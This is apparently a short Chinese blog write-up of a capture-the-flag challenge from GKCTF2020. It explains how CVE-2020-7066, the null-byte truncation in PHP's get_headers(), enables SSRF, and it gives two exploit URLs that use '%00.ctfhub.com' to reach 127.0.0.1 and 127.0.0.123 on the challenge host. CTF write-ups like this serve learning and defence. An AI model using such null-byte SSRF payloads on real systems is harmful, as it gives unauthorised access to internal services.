web | [GKCTF2020]cve版签到

hint: cve-2020-7066

是一个ssrf漏洞https://www.anquanke.com/vul/id/1966253

所以问题的关键就在于get_headers()这个函数可以被\0也就是%00截断。

题目样貌如下:

所以构造如下exp:

http://05ad3044-68f1-43de-8d1a-7a900bef9c23.node3.buuoj.cn/?url=http://127.0.0.1%00.ctfhub.com

然后题目提示访问127.0.0.123

访问就行了

http://05ad3044-68f1-43de-8d1a-7a900bef9c23.node3.buuoj.cn/?url=http://127.0.0.123%00.ctfhub.com

 

posted @ 2020-12-22 20:49  Mz1  阅读(113)  评论(0编辑  收藏  举报